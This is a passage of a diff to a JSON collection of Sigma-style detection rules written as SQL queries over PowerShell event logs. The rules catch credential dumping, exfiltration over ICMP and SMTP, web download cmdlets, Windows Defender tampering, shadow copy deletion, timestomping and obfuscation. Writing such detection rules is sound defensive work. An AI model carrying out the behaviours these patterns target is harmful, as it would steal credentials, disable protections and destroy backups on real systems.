- "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Compress-Archive %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Path %' ESCAPE '\\' AND ScriptBlockText LIKE '% -DestinationPath %' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%runAfterCancelProcess%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_zip_compress.yml" + "filename": "posh_ps_cl_mutexverifiers_lolscript.yml" }, { - "title": "Potential Data Exfiltration Via Audio File", - "id": "e4f93c99-396f-47c8-bb0f-201b1fa69034", - "status": "experimental", - "description": "Detects potential exfiltration attempt via audio file using PowerShell", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Dump Credentials from Windows Credential Manager With PowerShell", + "id": "99c49d9c-34ea-45f7-84a7-4751ae6b2cbc", + "status": "test", + "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", + "author": "frack113", "tags": [ - "attack.exfiltration" + "attack.credential_access", + "attack.t1555" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[System.Math]::%' ESCAPE '\\' AND ScriptBlockText LIKE '%[IO.FileMode]::%' ESCAPE '\\' AND ScriptBlockText LIKE '%BinaryWriter%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x52%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x49%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x46%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x57%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x41%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x56%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x45%' ESCAPE '\\' AND ScriptBlockText LIKE '%0xAC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Get-PasswordVaultCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CredManCreds%' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Windows.Security.Credentials.PasswordVault%' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Microsoft.CSharp.CSharpCodeProvider%' ESCAPE '\\' AND ScriptBlockText LIKE '%[System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())%' ESCAPE '\\' AND ScriptBlockText LIKE '%Collections.ArrayList%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.CodeDom.Compiler.CompilerParameters%' ESCAPE '\\')))" ], - "filename": "posh_ps_audio_exfiltration.yml" + "filename": "posh_ps_dump_password_windows_credential_manager.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - Powershell", - "id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "PowerShell ICMP Exfiltration", + "id": "4c4af3cd-2115-479c-8193-6b8bfce9001c", + "status": "test", + "description": "Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.", + "author": "Bartlomiej Czyz @bczyz1, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.exfiltration", + "attack.t1048.003" ], "falsepositives": [ - "Unknown" + "Legitimate usage of System.Net.NetworkInformation.Ping class" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Net.NetworkInformation.Ping%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Send(%' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml" + "filename": "posh_ps_icmp_exfiltration.yml" }, { "title": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", @@ -7046,185 +6954,205 @@ "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - Powershell", - "id": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", + "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Script", + "id": "b7a3c9a3-09ea-4934-8864-6a32cacd98d9", "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.collection", + "attack.t1074.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Compress-Archive %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Path %' ESCAPE '\\' AND ScriptBlockText LIKE '% -DestinationPath %' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_obfuscation_via_stdin.yml" + "filename": "posh_ps_susp_zip_compress.yml" }, { - "title": "Suspicious FromBase64String Usage On Gzip Archive - Ps Script", - "id": "df69cb1d-b891-4cd9-90c7-d617d90100ce", + "title": "Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript", + "id": "975b2262-9a49-439d-92a6-0709cccdf0b2", "status": "experimental", - "description": "Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward.", - "author": "frack113", + "description": "Detects usage of the \"Add-AppxPackage\" or it's alias \"Add-AppPackage\" to install unsigned AppX packages", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.defense_evasion" + ], "falsepositives": [ - "Legitimate administrative script" + "Installation of unsigned packages for testing purposes" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%FromBase64String%' ESCAPE '\\' AND ScriptBlockText LIKE '%MemoryStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%H4sI%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AppPackage %' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-AppxPackage %' ESCAPE '\\') AND ScriptBlockText LIKE '% -AllowUnsigned%' ESCAPE '\\')" ], - "filename": "posh_ps_frombase64string_archive.yml" + "filename": "posh_ps_install_unsigned_appx_packages.yml" }, { - "title": "Suspicious Get-ADReplAccount", - "id": "060c3ef1-fd0a-4091-bf46-e7d625f60b73", + "title": "Usage Of Web Request Commands And Cmdlets - ScriptBlock", + "id": "1139d2e2-84b1-4226-b445-354492eba8ba", + "status": "experimental", + "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs", + "author": "James Pemberton / @4A616D6573", + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "falsepositives": [ + "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR ScriptBlockText LIKE '%iwr %' ESCAPE '\\' OR ScriptBlockText LIKE '%wget %' ESCAPE '\\' OR ScriptBlockText LIKE '%curl %' ESCAPE '\\' OR ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resume-BitsTransfer%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Net.WebRequest]::create%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RestMethod%' ESCAPE '\\' OR ScriptBlockText LIKE '%WinHttp.WinHttpRequest%' ESCAPE '\\') AND NOT (Path LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\'))" + ], + "filename": "posh_ps_web_request_cmd_and_cmdlets.yml" + }, + { + "title": "Powershell Timestomp", + "id": "c6438007-e081-42ce-9483-b067fbef33c3", "status": "test", - "description": "The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\nThese include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n", + "description": "Adversaries may modify file time attributes to hide new or changes to existing files.\nTimestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.\n", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.006" + "attack.defense_evasion", + "attack.t1070.006" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate admin script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADReplAccount%' ESCAPE '\\' AND ScriptBlockText LIKE '%-All %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Server %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%.CreationTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%.LastWriteTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%.LastAccessTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetCreationTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetLastAccessTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetLastWriteTime%' ESCAPE '\\'))" ], - "filename": "posh_ps_get_adreplaccount.yml" + "filename": "posh_ps_timestomp.yml" }, { - "title": "Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell", - "id": "db885529-903f-4c5d-9864-28fe199e6370", + "title": "Windows Screen Capture with CopyFromScreen", + "id": "d4a11f63-2390-411c-9adf-d791fd152830", "status": "experimental", - "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\nScreen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations\n", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.collection", + "attack.t1113" ], "falsepositives": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADComputer %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter \\*' ESCAPE '\\' AND (ScriptBlockText LIKE '% | Select %' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-File%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Content%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%.CopyFromScreen%' ESCAPE '\\')" ], - "filename": "posh_ps_computer_discovery_get_adcomputer.yml" + "filename": "posh_ps_capture_screenshots.yml" }, { - "title": "Powershell Exfiltration Over SMTP", - "id": "9a7afa56-4762-43eb-807d-c3dc9ffe211b", + "title": "Tamper Windows Defender - PSClassic", + "id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", "status": "experimental", - "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", + "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. Or set default actions to allow.", "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1048.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Send-MailMessage%' ESCAPE '\\' AND NOT (ScriptBlockText LIKE '%CmdletsToExport%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '600' AND Channel = 'Windows PowerShell') AND ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND (HostApplication LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND HostApplication LIKE '%Allow%' ESCAPE '\\' AND (HostApplication LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (HostApplication LIKE '%ltdefac %' ESCAPE '\\' OR HostApplication LIKE '%mtdefac %' ESCAPE '\\' OR HostApplication LIKE '%htdefac %' ESCAPE '\\' OR HostApplication LIKE '%stdefac %' ESCAPE '\\'))))" ], - "filename": "posh_ps_send_mailmessage.yml" + "filename": "posh_pc_tamper_with_windows_defender.yml" }, { - "title": "Suspicious PowerShell Download - Powershell Script", - "id": "403c2cc0-7f6b-4925-9423-bfa573bed7eb", - "status": "experimental", - "description": "Detects suspicious PowerShell download command", - "author": "Florian Roth (Nextron Systems)", + "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell", + "id": "f65e22f9-819e-4f96-9c7b-498364ae7a25", + "status": "test", + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "PowerShell scripts that download content from the Internet" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Net.WebClient%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.DownloadFile(%' ESCAPE '\\' OR ScriptBlockText LIKE '%.DownloadString(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND HostApplication LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (HostApplication LIKE '%-ModuleName %' ESCAPE '\\' OR HostApplication LIKE '%-ModulePath %' ESCAPE '\\' OR HostApplication LIKE '%-ScriptBlock %' ESCAPE '\\' OR HostApplication LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_download.yml" + "filename": "posh_pc_susp_athremotefxvgpudisablementcommand.yml" }, { - "title": "Create Volume Shadow Copy with Powershell", - "id": "afd12fed-b0ec-45c9-a13d-aa86625dac81", + "title": "Remote PowerShell Session (PS Classic)", + "id": "60167e5c-84b2-4c95-a7ac-86281f27c445", "status": "test", - "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", - "author": "frack113", + "description": "Detects remote PowerShell sessions", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate use remote PowerShell sessions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%).Create(%' ESCAPE '\\' AND ScriptBlockText LIKE '%ClientAccessible%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ServerRemoteHost' AND HostApplication LIKE '%wsmprovhost.exe%' ESCAPE '\\')" ], - "filename": "posh_ps_create_volume_shadow_copy.yml" + "filename": "posh_pc_remote_powershell_session.yml" }, { - "title": "Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript", - "id": "975b2262-9a49-439d-92a6-0709cccdf0b2", - "status": "experimental", - "description": "Detects usage of the \"Add-AppxPackage\" or it's alias \"Add-AppPackage\" to install unsigned AppX packages", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell", + "id": "71ff406e-b633-4989-96ec-bc49d825a412", + "status": "test", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.defense_evasion" + "attack.collection", + "attack.t1074.001" ], "falsepositives": [ - "Installation of unsigned packages for testing purposes" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AppPackage %' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-AppxPackage %' ESCAPE '\\') AND ScriptBlockText LIKE '% -AllowUnsigned%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND HostApplication LIKE '%Compress-Archive %' ESCAPE '\\' AND HostApplication LIKE '% -Path %' ESCAPE '\\' AND HostApplication LIKE '% -DestinationPath %' ESCAPE '\\' AND HostApplication LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_install_unsigned_appx_packages.yml" + "filename": "posh_pc_susp_zip_compress.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", - "id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", + "title": "PowerShell Downgrade Attack - PowerShell", + "id": "6331d09b-4785-4c13-980f-f96661356249", "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", + "author": "Florian Roth (Nextron Systems), Lee Holmes (idea), Harish Segar (improvements)", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ScriptBlockText REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ScriptBlockText REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ScriptBlockText REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ScriptBlockText REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR ScriptBlockText REGEXP '\\$VerbosePreference\\.ToString\\('))" + "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND EngineVersion LIKE '2.%' ESCAPE '\\' AND NOT (HostVersion LIKE '2.%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml" + "filename": "posh_pc_downgrade_attack.yml" }, { - "title": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell", - "id": "e6cb92b4-b470-4eb8-8a9d-d63e8583aae0", + "title": "Suspicious XOR Encoded PowerShell Command Line - PowerShell", + "id": "812837bb-b17f-45e9-8bd0-0ec35d2e3bd6", "status": "experimental", - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", + "author": "Teymur Kheirkhabarov, Harish Segar (rule)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", "attack.t1059.001" ], @@ -7233,4739 +7161,4682 @@ ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%rundll32.exe%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ScriptBlockText LIKE '%powershell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ConsoleHost' AND (HostApplication LIKE '%bxor%' ESCAPE '\\' OR HostApplication LIKE '%join%' ESCAPE '\\' OR HostApplication LIKE '%char%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_rundll.yml" + "filename": "posh_pc_xor_commandline.yml" }, { - "title": "Suspicious Unblock-File", - "id": "5947497f-1aa4-41dd-9693-c9848d58727d", + "title": "PowerShell Called from an Executable Version Mismatch", + "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", "status": "test", - "description": "Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.", - "author": "frack113", + "description": "Detects PowerShell called from an executable by the version mismatch method", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1553.005" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Unblock-File %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (EngineVersion LIKE '2.%' ESCAPE '\\' OR EngineVersion LIKE '4.%' ESCAPE '\\' OR EngineVersion LIKE '5.%' ESCAPE '\\') AND HostVersion LIKE '3.%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_unblock_file.yml" + "filename": "posh_pc_exe_calling_ps.yml" }, { - "title": "Powershell Token Obfuscation - Powershell", - "id": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", - "status": "experimental", - "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", - "author": "frack113", + "title": "Suspicious Non PowerShell WSMAN COM Provider", + "id": "df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", + "status": "test", + "description": "Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1027.009" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR ScriptBlockText REGEXP '\"(\\{\\d\\}){2,}\"\\s*-f' OR ScriptBlockText REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}') AND NOT (((ScriptBlockText LIKE '%it will return true or false instead%' ESCAPE '\\' OR ScriptBlockText LIKE '%The function also prevents `Get-ItemProperty` from failing%' ESCAPE '\\')) OR (Path LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Path LIKE '%\\\\bin\\\\servicecontrol.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%`r`n%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND ProviderName = 'WSMan' AND NOT (HostApplication LIKE '%powershell%' ESCAPE '\\'))" ], - "filename": "posh_ps_token_obfuscation.yml" + "filename": "posh_pc_wsman_com_provider_no_powershell.yml" }, { - "title": "Suspicious Export-PfxCertificate", - "id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", - "status": "test", - "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", - "author": "Florian Roth (Nextron Systems)", + "title": "Delete Volume Shadow Copies Via WMI With PowerShell", + "id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", + "status": "stable", + "description": "Shadow Copies deletion using operating systems utilities via PowerShell", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Export-PfxCertificate%' ESCAPE '\\' AND NOT ((ScriptBlockText LIKE '%CmdletsToExport = @(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-WmiObject%' ESCAPE '\\' AND HostApplication LIKE '% Win32\\_Shadowcopy%' ESCAPE '\\' AND (HostApplication LIKE '%Delete()%' ESCAPE '\\' OR HostApplication LIKE '%Remove-WmiObject%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_export_pfxcertificate.yml" + "filename": "posh_pc_delete_volume_shadow_copies.yml" }, { - "title": "AADInternals PowerShell Cmdlets Execution - PsScript", - "id": "91e69562-2426-42ce-a647-711b8152ced6", - "status": "experimental", - "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", - "author": "Austin Songer (@austinsonger), Nasreddine 